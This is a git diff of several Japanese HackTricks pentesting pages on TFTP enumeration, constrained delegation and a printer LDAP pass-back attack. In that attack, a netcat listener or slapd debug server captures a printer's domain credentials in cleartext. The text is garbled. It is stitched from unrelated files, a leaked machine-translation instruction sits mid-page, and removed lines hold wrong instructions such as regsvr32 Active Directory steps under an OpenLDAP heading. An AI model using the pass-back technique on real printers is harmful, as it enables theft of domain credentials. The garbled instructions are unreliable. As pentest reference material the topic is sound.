| afp-showmount | 利用可能なAFPシェアとそれぞれのACLをリスト表示します |
### [**ブルートフォース**](../generic-methodologies-and-resources/brute-force.md#afp)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)で<strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong></a><strong>!</strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンやHackTricksのPDFをダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう
- **[💬](https://emojipedia.org/speech-balloon/) Discordグループ**に参加するか、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私を**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手してください
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見してください。私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションです。
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローしてください。**
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有してください。**
</details>

View file

@ -1,40 +1,40 @@
```markdown
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック!</strong></summary>
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
* **HackTricksにあなたの会社を広告したい場合**、または**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* **HackTricks**の[**githubリポジトリ**](https://github.com/carlospolop/hacktricks)や[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングテクニックを共有する。
</details>
# 基本情報
**TFTP**はUDPポート69を使用し、**認証は必要ありません**。クライアントは、RFC 1350で概説されているデータグラム形式を使用してサーバーから読み取り、書き込みます。プロトコルの不備認証の欠如と輸送セキュリティのなさのため、公共のインターネット上でサーバーを見つけることは珍しいです。ただし、大規模な内部ネットワークでは、TFTPを使用してVoIPハンドセットや他のデバイスに設定ファイルやROMイメージを提供するために使用されます。
**TFTP**はUDPポート69を使用し、**認証が不要**です。クライアントはRFC 1350で概説されたデータグラム形式を使用してサーバーから読み取り、サーバーに書き込みます。プロトコル内の不備認証の欠如とトランスポートセキュリティの不在のため、公開インターネット上のサーバーで見つけることは珍しいです。しかし、大規模な内部ネットワーク内では、TFTPはVoIPハンドセットやその他のデバイスに設定ファイルやROMイメージを提供するために使用されます。
**TODO**: Bittorrentトラッカーとは何かについての情報を提供しますShodanはこのポートをその名前で識別します。もし[**HackTricks telegramグループ**](https://t.me/peass)(または[PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)のgithub issueこの情報を持っている場合は、教えてください。
**TODO**: Bittorrent-trackerについての情報を提供してくださいShodanはこのポートをその名前で識別します。情報があれば、[**HackTricks telegramグループ**](https://t.me/peass)(または[PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)のgithub issueで教えてください。
**デフォルトポート:** 69/UDP
```
```
PORT STATE SERVICE REASON
69/udp open tftp script-set
```
# 列挙
TFTPはディレクトリリストを提供しないため、`nmap`のスクリプトである`tftp-enum`はデフォルトのパスをブルートフォースしようとします。
TFTPはディレクトリリストを提供しないため、`nmap`の`tftp-enum`スクリプトはデフォルトパスをブルートフォースで試みます。
```bash
nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>
```
## ダウンロード/アップロード
MetasploitまたはPythonを使用して、ファイルのダウンロード/アップロードができるかどうかを確認することができます。
ファイルのダウンロード/アップロードが可能かどうかを確認するために、MetasploitやPythonを使用できます
```bash
msf5> auxiliary/admin/tftp/tftp_transfer_util
```
@ -52,16 +52,14 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェックしてください!</strong></summary>
- あなたは**サイバーセキュリティ会社**で働いていますか? HackTricksであなたの**会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
* **HackTricksにあなたの会社を広告掲載したい場合**や**HackTricksをPDFでダウンロードしたい場合**は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**telegramグループ**](https://t.me/peass)に**参加する**か、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングテクニックを**共有する**。
</details>

View file

@ -1,65 +1,65 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください**
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
</details>
**LDAPのデフォルト/弱い**ログオン資格情報で構成されたプリンタを残す危険性を強調する**いくつかのブログ**がインターネット上にあります。\
これは、攻撃者がプリンタを**偽のLDAPサーバに認証**させる(通常は`nc -vv -l -p 444`で十分)ことができ、プリンタの**資格情報を平文でキャプチャ**する可能性があるためです。
インターネット上には、LDAPをデフォルト/弱いログオン資格情報で設定したプリンターの危険性を**強調するブログがいくつかあります**。\
これは、攻撃者がプリンターをだまして悪質なLDAPサーバーに対して認証させる通常は`nc -vv -l -p 444`で十分です)ことで、プリンターの**クリアテキストの資格情報をキャプチャする**可能性があるためです。
また、いくつかのプリンタには**ユーザ名のログ**が含まれているか、ドメインコントローラから**すべてのユーザ名をダウンロード**することができる場合もあります
また、いくつかのプリンターには**ユーザー名のログが含まれている**ことがあり、ドメインコントローラーから**すべてのユーザー名をダウンロードする**こともできるかもしれません
れらの**機密情報**と一般的な**セキュリティの欠如**により、プリンタは攻撃者にとって非常に興味深いものとなります。
このような**機密情報**と一般的な**セキュリティの欠如**は、攻撃者にとってプリンターを非常に興味深いものにします。
このトピックに関するいくつかのブログ
このトピックに関するいくつかのブログ:
* [https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/](https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/)
* [https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
**以下の情報は**[**https://grimhacker.com/2018/03/09/just-a-printer/**](https://grimhacker.com/2018/03/09/just-a-printer/)からコピーされました。
**以下の情報は** [**https://grimhacker.com/2018/03/09/just-a-printer/**](https://grimhacker.com/2018/03/09/just-a-printer/) **からコピーされました**
# LDAP設定
# LDAP設定
Konica Minoltaプリンタでは、LDAPサーバと認証に使用する資格情報を設定することができます。これらのデバイスのファームウェアの以前のバージョンでは、単にページのHTMLソースを読むことで資格情報を回復することができると聞いています。しかし、現在はインターフェースに資格情報は返されないため、少し手間がかかります。
Konica Minoltaのプリンターでは、LDAPサーバーに接続するための設定と資格情報を設定することができます。これらのデバイスの以前のファームウェアバージョンでは、ページのhtmlソースを読むだけで資格情報を回復できると聞いています。しかし、現在では資格情報はインターフェースで返されないため、もう少し努力が必要です。
LDAPサーバのリストは次の場所にあります:ネットワーク> LDAP設定> LDAPの設定
LDAPサーバーのリストは、Network > LDAP Setting > Setting Up LDAPの下にあります。
インターフェースでは、接続に使用される資格情報を再入力することなくLDAPサーバを変更することができます。これは、よりシンプルなユーザーエクスペリエンスのためのものだと思われますが、プリンタのマスターからドメイン上の足場にエスカレーションする機会を提供します。
インターフェースでは、接続に使用される資格情報を再入力せずにLDAPサーバーを変更することができます。これはよりシンプルなユーザーエクスペリエンスのためだと思われますが、攻撃者がプリンターのマスターからドメインへの足がかりを得る機会を与えています。
LDAPサーバアドレス設定を制御するマシンに再構成し、便利な「テスト接続」機能をトリガーすることができます。
「Test Connection」機能を使って、LDAPサーバーのアドレス設定を自分たちがコントロールするマシンに再設定し、接続をトリガーすることができます。
# グッズを聞く
# 情報を待ち受ける
## netcat
私よりも運が良ければ、単純なnetcatリスナーで済むかもしれません
私よりも運が良ければ、シンプルなnetcatリスナーで済むかもしれません:
```
sudo nc -k -v -l -p 386
```
私は、[@\_castleinthesky](https://twitter.com/\_castleinthesky) によってこれがほとんどの場合機能すると保証されていますが、私はまだそれほど簡単には解決されていません。
以下は、ハッキング技術に関するハッキングの本の内容です。ファイル windows-hardening/active-directory-methodology/ad-information-in-printers.md の関連する英語テキストを日本語に翻訳し、まったく同じマークダウンおよびhtml構文を保持して翻訳を返してください。コード、ハッキング技術名、ハッキング用語、クラウド/SaaSプラットフォーム名Workspace、aws、gcpなど、'leak'という単語、ペネトレーションテスト、およびマークダウンタグなどの翻訳は行わないでください。また、翻訳とマークダウン構文以外の余分なものは追加しないでください。
[\@_castleinthesky](https://twitter.com/_castleinthesky)によると、これはほとんどの場合に機能すると確信していますが、私はまだそのように簡単には解放されたことがありません。
## Slapd
プリンターは最初にヌルバインドを試み、その後利用可能な情報をクエリし、これらの操作が成功した場合にのみ資格情報でバインドします。したがって、完全なLDAPサーバーが必要です
プリンターは最初にnull bindを試み、その後利用可能な情報を照会します。これらの操作が成功した場合にのみ、資格情報を使用してbindを試みます。そのため、完全なLDAPサーバーが必要であることがわかりました
要件を満たすシンプルなLDAPサーバーを探しましたが、選択肢は限られているようでした。最終的に、OpenLDAPサーバーをセットアップし、slapdデバッグサーバーサービスを使用して接続を受け入れ、プリンターからのメッセージを出力することにしました。もし簡単な代替案をご存知の場合は、教えていただけると嬉しいです)
要件を満たすシンプルなldapサーバーを探しましたが、選択肢は限られているようでした。結局、open ldapサーバーを設定し、slapdデバッグサーバーサービスを使用して接続を受け入れ、プリンターからのメッセージを出力することにしました。もしもっと簡単な代替案をご存知であれば、教えていただけると嬉しいです)
### インストール
(このセクションは、こちらのガイドの軽く適応されたバージョンです:[https://www.server-world.info/en/note?os=Fedora\_26\&p=openldap](https://www.server-world.info/en/note?os=Fedora\_26\&p=openldap)
(このセクションは、こちらのガイド [https://www.server-world.info/en/note?os=Fedora\_26\&p=openldap](https://www.server-world.info/en/note?os=Fedora_26&p=openldap) を若干修正したバージョンです
rootターミナルから:
root端末から:
**OpenLDAPをインストールします。**
```
@ -69,7 +69,7 @@ rootターミナルから
#> chown ldap. /var/lib/ldap/DB_CONFIG
```
**OpenLDAPの管理者パスワードを設定します(後で再度必要になります)**
**OpenLDAPの管理者パスワードを設定する(間もなく再度必要になります)**
```
#> slappasswd
New password:
@ -94,49 +94,6 @@ SASL SSF: 0
modifying entry "olcDatabase={0}config,cn=config"
```
**基本スキーマのインポート**
```plaintext
To import basic Schemas, you can use the following command:
```powershell
regsvr32 /s schmmgmt.dll
```
This command will register the Active Directory Schema Management Snap-in, which allows you to manage the Active Directory schema.
Once the snap-in is registered, you can open the Active Directory Schema Management console by running the following command:
```powershell
mmc.exe
```
Then, go to `File -> Add/Remove Snap-in` and select `Active Directory Schema`. Click on `Add` and then `OK` to add the snap-in to the console.
Now, you can view and modify the Active Directory schema by expanding the `Active Directory Schema` node in the console.
Note: Importing basic Schemas requires administrative privileges.
```
```plaintext
基本スキーマをインポートするには、次のコマンドを使用します。
```powershell
regsvr32 /s schmmgmt.dll
```
このコマンドは、Active Directoryスキーマ管理スナップインを登録します。これにより、Active Directoryスキーマを管理することができます。
スナップインが登録されたら、次のコマンドを実行してActive Directoryスキーマ管理コンソールを開きます。
```powershell
mmc.exe
```
次に、`ファイル -> スナップインの追加/削除`に移動し、`Active Directoryスキーマ`を選択します。`追加`をクリックし、スナップインをコンソールに追加するために`OK`をクリックします。
これで、コンソール内の`Active Directoryスキーマ`ードを展開して、Active Directoryスキーマを表示および変更することができます。
注意:基本スキーマのインポートには管理者権限が必要です。
```
```
#> ldapadd -Y EXTERNAL -H ldapi:/// -f /etc/openldap/schema/cosine.ldif
SASL/EXTERNAL authentication started
@ -156,7 +113,7 @@ SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
adding new entry "cn=inetorgperson,cn=schema,cn=config"
```
**LDAP DB にドメイン名を設定します。**
**LDAP DBにドメイン名を設定します。**
```
# generate directory manager's password
#> slappasswd
@ -287,39 +244,7 @@ Signature ok
subject=/C=/ST=/L=/O=/OU=Foo Bar/CN=dlp.foo.bar/emailAddress=xxx@roo.bar
Getting Private key
```
**SSL / TLS のために Slapd を設定する**
To configure Slapd for SSL/TLS, follow the steps below:
1. Generate a self-signed certificate or obtain a certificate from a trusted Certificate Authority (CA).
2. Copy the certificate and private key files to the appropriate directory on the server. The default directory is usually `/etc/ldap/ssl/`.
3. Set the correct permissions for the certificate and private key files. The files should only be readable by the owner (root) and the LDAP server process.
4. Edit the Slapd configuration file, usually located at `/etc/ldap/slapd.conf` or `/etc/ldap/slapd.d/cn=config.ldif`.
5. Add the following lines to the configuration file:
```
TLSCACertificateFile /etc/ldap/ssl/ca.crt
TLSCertificateFile /etc/ldap/ssl/server.crt
TLSCertificateKeyFile /etc/ldap/ssl/server.key
```
Replace the file paths with the actual paths to your certificate and key files.
6. Save the configuration file and restart the Slapd service for the changes to take effect.
7. Test the SSL/TLS connection by using the `ldapsearch` command with the `-ZZ` option:
```
ldapsearch -H ldap://localhost -ZZ -x -b "dc=example,dc=com" -D "cn=admin,dc=example,dc=com" -W
```
Replace the LDAP server URL, base DN, and admin credentials with your own.
If the SSL/TLS configuration is successful, the `ldapsearch` command should return the LDAP entries without any errors.
**SlapdのSSL/TLS設定**
```
#> cp /etc/pki/tls/certs/server.key \
/etc/pki/tls/certs/server.crt \
@ -349,57 +274,43 @@ SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
SASL SSF: 0
modifying entry "cn=config"
```
**ローカルファイアウォールを介してLDAPを許可する**
To allow LDAP through your local firewall, follow these steps:
1. Open the Windows Firewall settings on your local machine.
2. Click on "Advanced settings" to access the advanced configuration options.
3. In the left pane, select "Inbound Rules" and then click on "New Rule" in the right pane.
4. Choose the rule type as "Port" and click "Next".
5. Select "TCP" as the protocol and enter the specific port number for LDAP (default is 389). Click "Next".
6. Select "Allow the connection" and click "Next".
7. Choose the network location where this rule should apply (e.g., Domain, Private, Public). Click "Next".
8. Provide a name and description for the rule, and click "Finish" to complete the process.
By allowing LDAP through your local firewall, you will be able to establish connections to LDAP servers and access Active Directory information from printers and other devices on your network.
**ローカルファイアウォールを通じてLDAPを許可する**
```
firewall-cmd --add-service={ldap,ldaps}
```
## ペイオフ
## 報酬
LDAPサービスをインストールして設定した後、のコマンドで実行できます:
LDAPサービスをインストールして設定した後、以下のコマンドで実行できます
> ```
> slapd -d 2
> ```
以下のスクリーンショットは、プリンターで接続テストを実行した際の出力の例を示しています。LDAPクライアントからサーバーにユーザー名とパスワードが渡されていることがわかります。
以下のスクリーンショットは、プリンターで接続テストを実行したときの出力の例を示しています。LDAPクライアントからサーバーへユーザー名とパスワードが渡されていることがわかります。
![ユーザー名「MyUser」とパスワード「MyPassword」を含むslapdのターミナル出力](https://i1.wp.com/grimhacker.com/wp-content/uploads/2018/03/slapd\_output.png?resize=474%2C163\&ssl=1)
![slapd terminal output containing the username "MyUser" and password "MyPassword"](https://i1.wp.com/grimhacker.com/wp-content/uploads/2018/03/slapd\_output.png?resize=474%2C163\&ssl=1)
# どれくらい悪いことが起こる可能性があるのか?
# どれほど悪いことが起こり得るのか?
これは設定された資格情報に大きく依存します。
これは設定されているクレデンシャルに大きく依存します。
最小特権の原則が守られている場合、Active Directoryの特定の要素に対して読み取りアクセスのみを取得することができるかもしれません。これは、さらに正確な攻撃を計画するための情報として依然として価値があります。
最小権限の原則が守られている場合、アクティブディレクトリの特定の要素に対して読み取りアクセスのみを得るかもしれません。これはしばしば価値があり、その情報を使用してさらに正確な攻撃を策定することができます。
通常、Domain Usersグループのアカウントを取得することができ、これにより機密情報へのアクセスが可能になったり、他の攻撃の前提となる認証が可能になったりします。
通常、ドメインユーザーグループのアカウントを取得する可能性が高く、これにより機密情報へのアクセスが可能になったり、他の攻撃のための事前認証が形成されることがあります。
あるいは、私のように、LDAPサーバーを設定する報酬として、ドメイン管理者アカウントを銀の盆に乗せて手渡されるかもしれません。
また、私のようにLDAPサーバーを設定することで、Domain Adminアカウントが手渡されるかもしれません。
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)で<strong>AWSハッキングをゼロからヒーローまで学ぶ</strong></a><strong></strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手**したいですか?または、**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter**で私をフォローしてください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
* **HackTricksにあなたの**会社を広告したい、または**HackTricksをPDFでダウンロード**したい場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)で**フォロー**する。
* **HackTricks**の[**githubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
</details>

View file

@ -2,34 +2,32 @@
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック!</strong></summary>
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
HackTricksをサポートする他の方法:
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
- [**公式のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
* [**HackTricks**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを**共有する**。
</details>
## 制約付き委任
これにより、ドメイン管理者はコンピュータをユーザーまたはコンピュータになりすませることができます。
これを使用すると、ドメイン管理者はコンピュータに対して、特定のマシンの**サービス**に対して**ユーザーやコンピュータを** **なりすまし**を**許可**することができます。
